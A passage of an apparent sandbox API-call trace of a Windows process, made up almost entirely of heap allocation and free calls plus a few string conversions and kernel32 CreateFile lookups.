out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0175.463] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0175.464] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.464] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0175.464] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0175.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0175.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0175.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0175.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0175.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0175.465] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0175.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0175.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0175.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0175.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0175.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0175.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0175.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0175.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0175.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0175.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0175.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0175.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0175.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0175.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0175.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0175.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0175.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0175.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0175.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.468] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0175.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0175.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0175.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0175.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0175.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0175.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0175.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.471] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0175.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bda38 [0175.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0175.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.472] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0175.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0175.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0175.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0175.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 